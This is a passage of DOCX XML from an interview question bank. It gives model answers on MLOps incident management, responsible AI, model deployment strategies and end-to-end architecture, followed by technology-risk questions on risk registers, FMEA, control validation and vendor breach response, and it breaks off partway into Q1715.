        <w:t>From an MLOps perspective, SLA, SLO, and SLI are critical for maintaining production reliability, operational excellence, monitoring, and customer trust in ML systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1706. Explain ML incident management.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: ML incident management is the process of identifying, responding to, resolving, and preventing issues or failures in machine learning systems running in production.</w:t>
        <w:br/>
        <w:t>It ensures that ML services remain reliable, available, and accurate while minimizing business impact during failures or abnormal behavior.</w:t>
        <w:br/>
        <w:t>Unlike traditional software incidents, ML incidents can involve not only infrastructure failures but also data drift, model degradation, feature issues, and prediction anomalies.</w:t>
        <w:br/>
        <w:t>Common ML Incidents</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Model Performance Degradation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Accuracy or prediction quality drops unexpectedly.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Data Drift or Concept Drift</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Production data changes significantly from training data.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Inference Latency Issues</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Prediction response times become too high.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Pipeline Failures</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * ETL, feature engineering, or retraining jobs fail.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Feature Store Issues</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Missing, stale, or inconsistent features.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      6. Infrastructure Failures</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * GPU, Kubernetes, network, or storage failures.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      7. Prediction Anomalies</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Sudden abnormal outputs or model instability.</w:t>
        <w:br/>
        <w:t>ML Incident Management Lifecycle</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Detection</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Monitoring and alerting systems identify anomalies.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Triage</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Teams assess severity and business impact.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Investigation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Root cause analysis is performed.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Mitigation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Rollback, scaling, retraining, or failover actions are taken.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Resolution</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * System is restored to normal operation.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      6. Postmortem Analysis</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Teams document lessons learned and prevention strategies.</w:t>
        <w:br/>
        <w:t>Common Mitigation Strategies</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Model rollback</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Champion-challenger deployment</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Canary releases</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Automated retraining</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Feature validation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Traffic rerouting</w:t>
        <w:br/>
        <w:t>Popular Tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Prometheus</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Grafana</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * PagerDuty</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * MLflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Datadog</w:t>
        <w:br/>
        <w:t>Importance in MLOps</w:t>
        <w:br/>
        <w:t>ML incident management is critical for:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Maintaining production reliability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reducing downtime</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Protecting business KPIs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ensuring compliance and governance</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Improving operational maturity of AI systems</w:t>
        <w:br/>
        <w:t>From an interview perspective, ML incident management combines traditional DevOps incident response with ML-specific monitoring, observability, and model lifecycle management practices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1707. What is responsible AI?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Responsible AI is the practice of designing, developing, deploying, and managing artificial intelligence systems in a way that is ethical, transparent, fair, secure, and accountable.</w:t>
        <w:br/>
        <w:t>The goal is to ensure AI systems are trustworthy and do not cause harm to individuals, organizations, or society.</w:t>
        <w:br/>
        <w:t>Responsible AI focuses not only on model accuracy but also on how AI impacts users, privacy, fairness, and decision-making.</w:t>
        <w:br/>
        <w:t>Core Principles of Responsible AI</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Fairness</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * AI systems should avoid bias and discrimination across different groups.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Transparency and Explainability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Users should understand how AI models make decisions.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Privacy and Security</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Sensitive data must be protected and handled securely.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Accountability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Organizations should take responsibility for AI outcomes and failures.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Reliability and Safety</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * AI systems should perform consistently and safely under different conditions.</w:t>
        <w:br/>
        <w:t xml:space="preserve">      6. Inclusiveness</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * AI should work effectively for diverse users and environments.</w:t>
        <w:br/>
        <w:t>Common Responsible AI Challenges</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Biased datasets</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Lack of explainability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Privacy risks</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Model misuse</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ethical concerns in automation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Regulatory compliance requirements</w:t>
        <w:br/>
        <w:t>Techniques Used in Responsible AI</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Bias detection and mitigation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Explainable AI (XAI)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Model auditing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Human-in-the-loop validation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Data governance</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Monitoring and observability</w:t>
        <w:br/>
        <w:t>Popular Responsible AI Tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Fairlearn</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * IBM AI Fairness 360</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * SHAP</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * LIME</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TensorFlow Fairness Indicators</w:t>
        <w:br/>
        <w:t>Importance in MLOps</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, Responsible AI is important for:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ethical AI governance</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Regulatory compliance</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Building user trust</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reducing legal and reputational risks</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ensuring sustainable AI adoption</w:t>
        <w:br/>
        <w:t>In enterprise environments, Responsible AI is considered a critical part of production-grade AI system design and lifecycle management.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1708. Explain model deployment strategies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Model deployment strategies are approaches used to release machine learning models into production environments safely, reliably, and with minimal business risk.</w:t>
        <w:br/>
        <w:t>These strategies help organizations manage model updates, monitor performance, and ensure stable production inference during deployments.</w:t>
        <w:br/>
        <w:t>Common Model Deployment Strategies</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>1. Blue-Green Deployment</w:t>
        <w:br/>
        <w:t>Two identical environments are maintained:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Blue → Current production environment</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Green → New model version</w:t>
        <w:br/>
        <w:t>Traffic is switched to the green environment after validation.</w:t>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Easy rollback</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Minimal downtime</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Safer deployments</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Canary Deployment</w:t>
        <w:br/>
        <w:t>The new model is deployed to a small percentage of users or traffic first.</w:t>
        <w:br/>
        <w:t>If performance is stable, traffic is gradually increased.</w:t>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reduced deployment risk</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Real-world validation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Early issue detection</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Shadow Deployment</w:t>
        <w:br/>
        <w:t>The new model receives live traffic in parallel with the production model but does not serve predictions to users.</w:t>
        <w:br/>
        <w:t>Predictions are monitored and compared silently.</w:t>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Safe testing in production</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * No impact on end users</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Useful for performance evaluation</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. A/B Testing</w:t>
        <w:br/>
        <w:t>Different users receive predictions from different models for comparison.</w:t>
        <w:br/>
        <w:t>Business and model metrics are analyzed to determine the better-performing model.</w:t>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Data-driven model evaluation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Business KPI comparison</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Supports experimentation</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>5. Champion-Challenger Deployment</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Champion → Current production model</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Challenger → Candidate model being evaluated</w:t>
        <w:br/>
        <w:t>The challenger replaces the champion if it consistently performs better.</w:t>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Continuous model improvement</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Controlled promotion process</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>6. Rolling Deployment</w:t>
        <w:br/>
        <w:t>The new model version is gradually deployed across servers or containers while old instances are removed incrementally.</w:t>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Controlled rollout</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Reduced downtime</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Efficient resource usage</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Important Considerations</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Monitoring and observability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Rollback mechanisms</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Latency and scalability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Feature parity</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Model versioning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Security and compliance</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Popular Tools and Platforms</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * KServe</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Seldon Core</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * MLflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TensorFlow Serving</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Istio</w:t>
        <w:br/>
        <w:t>From an MLOps perspective, deployment strategies are critical for achieving reliable, scalable, low-risk, and continuously improving ML systems in production environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1709. Describe an end-to-end MLOps architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An end-to-end MLOps architecture is a complete framework that automates and manages the entire machine learning lifecycle from data ingestion to model monitoring and retraining in production.</w:t>
        <w:br/>
        <w:t>The goal is to build scalable, reliable, reproducible, and continuously improving ML systems using DevOps and Data Engineering practices.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>1. Data Ingestion Layer</w:t>
        <w:br/>
        <w:t>This layer collects data from multiple sources such as:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Databases</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * APIs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * IoT devices</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Logs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Streaming platforms</w:t>
        <w:br/>
        <w:t>Common Tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Apache Kafka</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Apache Spark</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * AWS Glue</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Data Storage Layer</w:t>
        <w:br/>
        <w:t>Stores raw and processed data in centralized repositories.</w:t>
        <w:br/>
        <w:t>Storage Types</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Data lakes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Data warehouses</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Object storage</w:t>
        <w:br/>
        <w:t>Common Platforms</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Amazon Web Services S3</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Google Cloud Cloud Storage</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Microsoft Azure Data Lake</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Data Processing &amp; Feature Engineering</w:t>
        <w:br/>
        <w:t>Performs:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Data cleaning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Transformation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Validation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Feature generation</w:t>
        <w:br/>
        <w:t>Features are stored in a feature store for reuse.</w:t>
        <w:br/>
        <w:t>Tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Apache Spark</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Feast</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * dbt</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Model Training Layer</w:t>
        <w:br/>
        <w:t>Responsible for:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Experimentation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Distributed training</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Hyperparameter tuning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Model evaluation</w:t>
        <w:br/>
        <w:t>Tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * TensorFlow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * PyTorch</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * MLflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubeflow</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>5. Experiment Tracking &amp; Metadata Management</w:t>
        <w:br/>
        <w:t>Tracks:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Parameters</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Metrics</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Dataset versions</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Model lineage</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Artifacts</w:t>
        <w:br/>
        <w:t>Tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * MLflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Weights &amp; Biases</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>6. CI/CD/CT Pipeline</w:t>
        <w:br/>
        <w:t>Automates:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Code testing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Model validation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Deployment</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Continuous training</w:t>
        <w:br/>
        <w:t>Tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Jenkins</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * GitHub Actions</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * GitLab CI/CD</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>7. Model Registry</w:t>
        <w:br/>
        <w:t>Stores and manages model versions and lifecycle stages.</w:t>
        <w:br/>
        <w:t>Features</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Versioning</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Approval workflows</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Rollback support</w:t>
        <w:br/>
        <w:t>Tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * MLflow Model Registry</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>8. Model Packaging &amp; Deployment</w:t>
        <w:br/>
        <w:t>Models are containerized and deployed to scalable serving infrastructure.</w:t>
        <w:br/>
        <w:t>Deployment Methods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Real-time inference</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Batch inference</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Streaming inference</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Edge deployment</w:t>
        <w:br/>
        <w:t>Tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Docker</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * KServe</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Seldon Core</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>9. Monitoring &amp; Observability</w:t>
        <w:br/>
        <w:t>Monitors:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Accuracy</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Drift</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Latency</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Infrastructure metrics</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Feature freshness</w:t>
        <w:br/>
        <w:t>Tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Prometheus</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Grafana</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Evidently AI</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>10. Automated Retraining &amp; Feedback Loop</w:t>
        <w:br/>
        <w:t>Production monitoring triggers:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Retraining</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Validation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Redeployment</w:t>
        <w:br/>
        <w:t>This enables continuous improvement of models.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Infrastructure Layer</w:t>
        <w:br/>
        <w:t>The entire architecture usually runs on scalable cloud-native infrastructure.</w:t>
        <w:br/>
        <w:t>Infrastructure Components</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes clusters</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * GPU/TPU scheduling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Infrastructure as Code</w:t>
        <w:br/>
        <w:t>Tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Terraform</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ansible</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Helm</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Security &amp; Governance Layer</w:t>
        <w:br/>
        <w:t>Includes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * RBAC</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Secrets management</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Data governance</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Responsible AI</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Compliance monitoring</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>End-to-End Flow</w:t>
        <w:br/>
        <w:t>Data → Processing → Feature Engineering → Training → Tracking → Registry → Deployment → Monitoring → Retraining</w:t>
        <w:br/>
        <w:t>From an interview perspective, a strong MLOps architecture focuses on automation, scalability, reproducibility, monitoring, governance, and continuous delivery of ML systems in production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Technology Risk - Technical</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1710. Risk register and heatmap: What fields would you maintain in a technology risk register, how would you score likelihood/impact, and how would you convert it into a leadership heatmap?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A risk register should track risk ID, description, category, owner, likelihood (1-5), impact (1-5), inherent vs residual risk score, existing controls, mitigation plan, target date, and status. Score likelihood/impact using a consistent rubric with defined criteria per level (not gut feel), multiply them into a risk score, and plot risks on a 5x5 heatmap by likelihood x impact so leadership can see at a glance which risks sit in the red (high-high) zone and need immediate attention versus the green zone that can be monitored.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1711. Change risk: A major architecture change introduces a new data flow, API gateway, and cloud database. What risk questions would you ask before approval?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What data flows through the new path and does it include regulated/sensitive data requiring encryption or residency controls; who has access to the new API gateway and database, and is it least-privilege; what is the blast radius and rollback plan if the change fails; has it gone through security review (auth, network exposure, secrets management); and does it introduce new third-party dependencies or single points of failure that need monitoring and an owner before go-live.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1712. FMEA and scenario analysis: How would you use FMEA or scenario analysis to identify high-impact technology failure modes before they become incidents?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Walk through each critical component or process and ask how it could fail (failure mode), what would cause it, what the effect on the business would be, and score each on severity, occurrence likelihood, and detectability to get a Risk Priority Number - failure modes with the highest RPN get mitigation attention first. Complement this with scenario analysis (tabletop exercises simulating specific failures like a regional outage or a compromised credential) to validate that the FMEA scores match how the team actually responds under pressure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1713. Control validation: How would you test whether a control is actually working, for example privileged access, deployment approval, backup restore, or vulnerability SLA closure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Don't just confirm the control is documented - test it directly: attempt an unauthorized privileged access request and confirm it's blocked or flagged, verify a deployment cannot bypass the approval gate, actually restore from a backup and validate data integrity rather than trusting that backups 'exist', and sample a set of vulnerability tickets to confirm they were closed within SLA with evidence, not just marked closed. Document the test method and evidence so audit can rely on it rather than re-testing from scratch.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1714. Scenario - vendor breach notification: A third-party SaaS vendor discloses a data breach affecting a system your team integrates with. Walk through your first 24 hours.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: First establish exactly what data and integrations are affected by pulling the vendor's notification details against your own data flow diagrams - don't assume the vendor's scope assessment is complete. Notify internal stakeholders (security, legal, affected product owners) immediately, rotate any shared credentials or API keys with that vendor as a precaution regardless of whether they were confirmed compromised, and check your own logs for any anomalous activity on the integration points during the breach window. Document the timeline and actions taken as you go, since regulatory notification requirements often have tight deadlines and need an evidenced response, not a reconstructed one.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1715. Scenario - audit finds unencrypted backups: An internal audit finds that database backups have been stored unencrypted for 8 months. How would you handle disclosure, remediation, and prevention?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
